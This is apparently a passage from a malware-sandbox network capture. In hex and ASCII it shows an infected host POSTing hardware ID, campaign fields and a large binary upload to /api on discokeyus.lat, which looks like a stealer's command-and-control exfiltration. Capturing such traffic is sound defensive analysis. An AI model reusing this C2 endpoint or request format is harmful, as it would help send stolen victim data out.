                                                                                                                                                                                                                                                                          2024-12-21 00:15:57 UTC987OUTData Raw: ab 93 8c 16 ad 24 13 94 3b 8c f6 b9 e8 4d a1 7b 25 59 ba 41 ff ef a3 aa 32 1d bf ee 2a b9 2e 66 74 3d c1 46 5c 2a df 78 64 aa 74 67 79 dc 94 d4 60 2d 5a 20 de 71 ec c0 5c 19 de 73 ae db 38 5b 28 2d 2f 6b 0f f2 43 6b de e2 f0 e1 ed 47 c6 ac 75 8b 43 f5 a5 c3 55 46 aa 4a e0 ed ed 05 76 f8 e9 17 7b ed 39 ae 13 34 14 cb a9 06 f5 a4 9c 5a 15 97 c8 45 59 8f bf d5 d0 8d 9b 67 a6 4a df ba 3a b9 ac 06 eb f6 92 e5 35 d8 7b 56 bc 37 cf f6 de 9f bb 8b 4f 17 4a 97 2e 69 f7 e7 a3 e2 b3 6b f5 de 7b 64 90 f8 78 39 55 68 89 00 fd e8 07 57 d4 da c9 d6 ab 1c 35 b6 83 d9 fd a8 25 96 2f 16 d1 aa 35 ab 1a bd 74 4c 98 78 ee 9e d2 0b a5 cd 65 ad 6b 44 e7 db 7f 61 eb 2d 62 09 12 6f 70 a6 32 c2 a5 d4 8d 30 f1 70 79 73 0c 47 4a bc 14 1b dd d7 2e 46 f5 ee fe cd 54 7f a1 1f 75 78 fb
                                                                                                                                                                                                                                                                          Data Ascii: $;M{%YA2*.ft=F\*xdtgy`-Z q\s8[(-/kCkGuCUFJv{94ZEYgJ:5{V7OJ.ik{dx9UhW5%/5tLxekDa-bop20pysGJ.FTux
                                                                                                                                                                                                                                                                          2024-12-21 00:15:58 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:15:58 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=eodmkfbv3dl5piop6m1c6algps; expires=Tue, 15 Apr 2025 18:02:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hGISIe5BhuWmq%2FnOd7CK2QdxEkQpWlQkPJZG2YY2VTmwV0SCEIq764ub1P64TxHNzts45qe169EpKgEPzY7kxMi8fL1AM55kiAEGaP10Pke9oOAueMEY7Z%2BJJ7%2Ffi%2F6mSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae435bdcc3f5-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1716&rtt_var=653&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2832&recv_bytes=17275&delivery_rate=1661923&cwnd=222&unsent_bytes=0&cid=562930b575d794bb&ts=880&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:15:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:15:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          40192.168.2.550164172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:00 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=RJ1WRGS92MXJ
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 20531
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:00 UTC15331OUTData Raw: 2d 2d 52 4a 31 57 52 47 53 39 32 4d 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 4a 31 57 52 47 53 39 32 4d 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 52 4a 31 57 52 47 53 39 32 4d 58 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 52 4a 31 57 52 47 53 39 32 4d 58 4a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: --RJ1WRGS92MXJContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--RJ1WRGS92MXJContent-Disposition: form-data; name="pid"3--RJ1WRGS92MXJContent-Disposition: form-data; name="lid"PsFKDg--pablo--RJ1WRGS92MXJ
                                                                                                                                                                                                                                                                          2024-12-21 00:16:00 UTC5200OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: un 4F([:7s~X`nO`i
                                                                                                                                                                                                                                                                          2024-12-21 00:16:01 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:00 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=lk7eg72br3ruehlg38lglfq3jh; expires=Tue, 15 Apr 2025 18:02:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykYWXkRkAQDWBoTIZAKtawcn4lIcgwxZtct%2BTeCi7lYBPlK0sT4nS%2BfE2ZVm5JZE5OJVuRIoK7cemsE6pwe2keTsA9MvQDJjTpK3wiglL7hsVIyqwml7z5i85DGcAA%2FSTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae51f96bc327-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1452&rtt_var=609&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21485&delivery_rate=1706604&cwnd=189&unsent_bytes=0&cid=4548761da2838830&ts=942&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          41192.168.2.550167172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:02 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=OB5GESMA7TJHBD19
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 1324
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:02 UTC1324OUTData Raw: 2d 2d 4f 42 35 47 45 53 4d 41 37 54 4a 48 42 44 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 42 35 47 45 53 4d 41 37 54 4a 48 42 44 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 42 35 47 45 53 4d 41 37 54 4a 48 42 44 31 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 42
                                                                                                                                                                                                                                                                          Data Ascii: --OB5GESMA7TJHBD19Content-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--OB5GESMA7TJHBD19Content-Disposition: form-data; name="pid"1--OB5GESMA7TJHBD19Content-Disposition: form-data; name="lid"PsFKDg--pablo--OB
                                                                                                                                                                                                                                                                          2024-12-21 00:16:03 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:03 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=v0h18aedphbjj7levlam1j0np8; expires=Tue, 15 Apr 2025 18:02:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqZwNAh6sW0cMAFJPvvV0xQNEEpKG7WUHO4CvFEXvvSpS%2BUN49mxko5pq0nymegfCwLY1Z8c90%2BnGCh6fi6WtzTGezr4G8anpJV%2BgNqWoeDgZhB7iqYjSiLbjSSY8wVYnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53ae6089fd72a1-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1826&rtt_var=913&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4202&recv_bytes=2237&delivery_rate=217488&cwnd=194&unsent_bytes=0&cid=ae751ba216ee3b05&ts=843&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          42192.168.2.550169172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=ZUC21LJAWQQ7NHPAYIN
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 550509
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: 2d 2d 5a 55 43 32 31 4c 4a 41 57 51 51 37 4e 48 50 41 59 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 55 43 32 31 4c 4a 41 57 51 51 37 4e 48 50 41 59 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 55 43 32 31 4c 4a 41 57 51 51 37 4e 48 50 41 59 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                                                                                                                                                          Data Ascii: --ZUC21LJAWQQ7NHPAYINContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--ZUC21LJAWQQ7NHPAYINContent-Disposition: form-data; name="pid"1--ZUC21LJAWQQ7NHPAYINContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: 35 28 28 b3 01 2e 1e 11 d6 e5 08 85 18 de 37 70 5f b2 f8 a6 8b 5a 95 f5 66 f8 a3 af 5f ea 46 51 10 01 d6 dd 2b da 7c 46 a4 6c db 7f 8d 38 94 10 d0 cf 0a 53 58 34 eb 0c 62 66 fe eb 2c 26 74 69 d8 84 c4 40 cc 88 e4 ca a1 e9 bc 65 10 b0 97 aa 8d 0d e1 03 53 bd e8 c5 cd a3 43 11 87 ef b2 af 1b 14 a1 28 0d 71 95 4f 35 d2 b6 1a 23 da 8e e3 de fc 5e 78 97 7c 08 9d 80 da 2a 11 4c b1 66 e0 49 9e ad e5 4f 6d ac 74 4d 97 21 b3 36 9b 9a 8c a8 9a 31 27 7e 43 4e f6 28 02 8e 17 6f 8e 0c 36 1d 66 5a 4c 36 6e ea 26 7d 67 6b 64 57 c7 84 a5 42 48 76 a5 10 15 03 4f a3 8e fd f5 05 de 54 43 51 ca 40 f1 3a dd a0 79 49 d3 c6 b5 3a 15 8b 77 00 5f 8c c4 82 5c 66 3f 07 9c 50 22 29 ec ec 47 f9 04 3a 3e 46 c4 04 a8 b1 48 65 68 cb e5 16 3d 1c 80 ba 6c e7 6b 44 09 a9 16 7d cd 2d 99 99
                                                                                                                                                                                                                                                                          Data Ascii: 5((.7p_Zf_FQ+|Fl8SX4bf,&ti@eSC(qO5#^x|*LfIOmtM!61'~CN(o6fZL6n&}gkdWBHvOTCQ@:yI:w_\f?P")G:>FHeh=lkD}-
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: aa 7d 25 69 f9 3f ca e0 66 5d e1 d4 42 48 00 0a e4 38 05 3e 8e f3 25 0a a3 57 8a c1 62 67 46 6a 7a 84 30 36 b5 7d f5 b2 20 4e 7e 36 f6 b6 1c 1b e9 44 a6 e5 c3 70 a4 12 41 d7 5e 10 21 ad 6a 14 f9 3b 21 91 66 df 77 19 7a 9b bd 3d e8 30 c4 49 ef b0 45 9b 1e 28 f7 30 b3 35 83 04 fd 64 47 ba a8 b1 91 17 be cd bf 47 c5 d7 61 31 10 f8 74 7a 5f 91 26 9e 20 48 f2 c2 49 0b b9 49 52 0d e0 22 47 20 1d 05 bf 59 3d f3 32 90 df 24 f7 bf 24 79 aa a1 71 61 6f 52 d7 9f d3 06 97 bd e7 cb ff 9d fd 74 a0 b1 b2 ad e8 25 ab 02 65 5b 28 46 e8 d9 bf 98 87 9a ff 6b a3 ff c9 7f 51 8c aa bd c9 6d 43 e4 b5 c7 6b e7 f0 20 c3 fb 75 95 6b 46 53 4b 9e 05 b9 23 33 d0 29 ca 5c 33 79 e7 98 c3 fb 88 51 df 43 92 5d 7f 4f b2 29 9c ab a0 54 df 70 e7 fb ee eb 71 a5 7e 9a e7 5e 55 f1 ae bb 3c 79
                                                                                                                                                                                                                                                                          Data Ascii: }%i?f]BH8>%WbgFjz06} N~6DpA^!j;!fwz=0IE(05dGGa1tz_& HIIR"G Y=2$$yqaoRt%e[(FkQmCk ukFSK#3)\3yQC]O)Tpq~^U<y
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: f8 56 ca 6f 5b 8d 8f d1 65 d2 f1 c9 54 df c5 f7 48 b5 13 66 89 e9 09 41 73 67 88 c4 53 71 f3 b0 61 f4 08 f6 84 1f 81 8a 7e dd 3c 95 6c 37 8d 2e 8b 8d 9e 30 81 be ed 8f 0b 97 a3 9d d6 25 0e b7 66 f6 f1 77 a1 ee 73 d6 21 bb 5f fd d1 70 ea d3 71 b0 09 e7 78 87 47 f0 60 86 9a 66 ef 8f dc 4b d8 54 cc 7d b2 56 af 43 3e f5 0d 7f 59 16 cb b5 28 d5 3d 2e a0 8a a6 9c 5a cc 33 44 2e 3e 76 77 20 55 48 04 9c cb b5 8c c0 7f 2e 0d bc a0 1b e6 7c 23 3f da 27 51 c0 8d 4b 2a 7f c3 73 6a dd 7d d8 90 bc 72 c5 21 e4 d5 cf d5 9a ad ba 4f e3 e3 74 7c 4b 21 4f 84 0a 9d 8b cd 50 88 78 89 a4 9f 4e 5d a1 c4 a8 54 ca ce 9f 3f b4 8e c3 27 0d 34 84 4a 6f 3d 32 e4 56 8b c1 aa f5 87 57 32 9d 87 84 8d df 52 1e 31 f8 27 a6 fc 0a ba b6 02 9d 78 75 c7 73 f5 c1 3e d7 fc 96 ee 19 99 73 1f 4c
                                                                                                                                                                                                                                                                          Data Ascii: Vo[eTHfAsgSqa~<l7.0%fws!_pqxG`fKT}VC>Y(=.Z3D.>vw UH.|#?'QK*sj}r!Ot|K!OPxN]T?'4Jo=2VW2R1'xus>sL
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: fa 5d ac 2a 2f 47 95 5b e7 e4 98 da cc ff 26 17 ec 69 f7 32 c2 43 bf fb d3 5b 4a 02 5d a5 e3 83 1b ec 12 b8 73 ad 6f 9e a1 35 5c 09 b9 17 9a 3e 7f ab 5d f5 cd 1d 43 3b 01 b9 77 3f 12 9a 4f 26 23 bd 0a 88 6a 63 47 23 d4 b2 12 e2 2a 44 c7 a1 55 81 f5 63 f3 3f 5c d5 6e b2 6e 1d c3 be 21 26 ba b8 19 2d 6a 19 1f a5 4f f1 31 75 a1 db 19 bb 70 19 ca 0f d6 97 57 7c 64 1e 9e 8e 6f 60 a7 54 4a ce 14 5b 85 f4 28 49 14 7e 8b 76 c6 4e 26 47 fc 88 2f 90 7e e3 c5 31 3d 4b 17 66 bd d7 83 97 de cc 7a d1 49 ec bd 81 3b 07 c3 88 97 fe 6f 94 0d de b4 fe bf a1 96 00 6c 76 8c 5f ff 07 28 11 f7 f6 0e 84 aa 70 4a 08 83 7d a8 88 db e0 1e 07 18 a7 56 9e 83 48 73 bf cc c2 dc 52 10 74 85 06 92 2a c0 7d e0 07 e0 08 03 09 22 8a 45 c3 c8 47 30 bc 56 8c e8 2f b8 13 1c 5d 86 5e 8e af 37
                                                                                                                                                                                                                                                                          Data Ascii: ]*/G[&i2C[J]so5\>]C;w?O&#jcG#*DUc?\nn!&-jO1upW|do`TJ[(I~vN&G/~1=KfzI;olv_(pJ}VHsRt*}"EG0V/]^7
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: 9a 17 d5 c2 d0 9e e9 4d e4 61 11 f5 80 16 da f3 8e 5a a3 53 4f d9 12 4b b5 30 07 d9 f3 55 13 79 09 1a aa bd 6b fd 2d 99 c8 68 7e 0e 08 7f 13 ba 33 10 6c b1 c3 43 9f f0 3f 59 76 af 02 67 b0 54 f7 64 a9 a4 41 7a f1 55 3c 58 14 9b 71 f4 62 1b cc ea f9 ea e7 b3 3e 55 85 f4 b3 bf de 9d 53 4d 6d 9e 35 58 a9 11 f8 1a ef af 04 b4 0d 00 89 83 d5 13 48 bd 3c c5 24 d2 89 05 1c 1f bb d5 f4 dd 7a 94 ce 79 71 8c 97 22 b9 33 18 95 d9 86 64 f2 0f 5e 2c 08 f8 19 ab 28 06 cd 8b 21 d6 67 70 fb f6 ee 4e 7c 83 23 21 0d 22 a9 e2 bc be 00 bc cc fd 8a 0f 5d 12 94 27 30 87 83 86 71 7b a7 8c 9b 88 74 79 88 1e 7a 93 83 8f 1b f6 ee a5 3b cf d0 ef e0 f1 27 60 db 50 08 03 af 0d 1b 14 d0 f3 40 ca ee d4 65 9e db 35 a6 2b 00 73 6c 92 16 d2 d2 28 dd 20 93 c6 ef 4d 32 0d 33 71 93 fc 73 e9
                                                                                                                                                                                                                                                                          Data Ascii: MaZSOK0Uyk-h~3lC?YvgTdAzU<Xqb>USMm5XH<$zyq"3d^,(!gpN|#!"]'0q{tyz;'`P@e5+sl( M23qs
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: 54 4a cc 71 c2 06 6b 7e 20 43 87 69 f4 40 5f 67 cb 4b 4a ad 71 3d d9 ef 49 96 25 e4 d6 14 94 da b6 73 19 c2 ca 67 95 33 bd 8a 0a eb 6a f7 9a 56 f6 1b 93 12 a5 2a 5a fc 79 36 8d 16 88 a6 b7 b9 a1 62 6c 43 b5 71 7c 96 69 1c c4 c7 4d c7 32 c2 2b 0a 60 83 44 d6 45 b3 ac 68 dd a6 88 e2 b9 7a 1d d4 07 45 2b 28 ab 1c a3 4d 4c fe ad c0 c3 cb 8d 85 50 a2 13 0e 85 98 54 f1 68 8a 24 a6 c4 33 90 d1 b9 ee 2e 13 a5 61 cb 77 20 53 75 c3 5c b1 3a 36 2c 90 bd 3c ac 83 0a e3 82 bf 8c 44 56 20 61 d5 b9 61 f1 1d e2 a4 eb a3 99 1b d9 72 43 25 8d dc f4 6d fa 62 d2 03 59 7d c9 9d a9 78 62 da 85 25 7a 31 65 b9 e0 65 6f d5 68 65 0e eb e1 be 73 3b d6 c4 7b 33 23 f6 72 dd 05 7f b2 e3 7f 8c 55 39 9b 85 c7 f3 83 f5 b9 c1 df db 2f 4d 94 29 7f d7 d5 f8 9a 76 3e 72 4d 92 0d 63 fc 3b 45
                                                                                                                                                                                                                                                                          Data Ascii: TJqk~ Ci@_gKJq=I%sg3jV*Zy6blCq|iM2+`DEhzE+(MLPTh$3.aw Su\:6,<DV aarC%mbY}xb%z1eeohes;{3#rU9/M)v>rMc;E
                                                                                                                                                                                                                                                                          2024-12-21 00:16:05 UTC15331OUTData Raw: f8 4d f8 c7 d0 e3 65 c5 19 61 5e db e6 cc 20 ec 25 cb cb b5 eb 74 a7 3d c7 5f 17 a1 15 1b 06 7e 53 8b ff a9 ca 46 cb c1 81 70 d8 7d 86 d0 c4 bb 5c cb d1 2c 34 1c 9a 12 36 a3 d0 a0 1f f9 d6 48 37 2e 9c 67 16 6c cd 2c 96 bf 44 31 a7 c4 f6 d2 be 7e c3 5e 91 d6 c2 88 7c 7c 60 5f d8 14 34 af 47 8c 8b e1 a8 55 ea 3b 73 83 c4 a0 45 07 b3 17 e9 da 09 41 ac b4 fe 01 8a d8 f0 cf df 11 bd 65 94 e2 c5 75 ee c3 1a 8d bf b3 f1 78 da 83 e4 a4 7d f2 b1 81 e3 b2 17 c7 78 fa 9a fb 0a 4d 43 44 e7 6c a0 93 03 87 bc 26 05 ce aa 00 94 5f cc ec c2 2f 5f 71 85 d8 7a d1 76 41 ae 43 12 ad ef 53 02 b4 a7 db 33 7c 40 42 59 bc df b6 49 aa f8 c2 b8 57 cd 77 9d 57 f9 f8 5e 2c 38 37 61 e8 11 1f 36 63 fc f5 62 e6 ce f6 1f a1 b6 36 e9 7f d2 a1 09 e8 a5 60 8e e0 82 20 18 3b d5 67 96 63 76
                                                                                                                                                                                                                                                                          Data Ascii: Mea^ %t=_~SFp}\,46H7.gl,D1~^||`_4GU;sEAeux}xMCDl&_/_qzvACS3|@BYIWwW^,87a6cb6` ;gcv
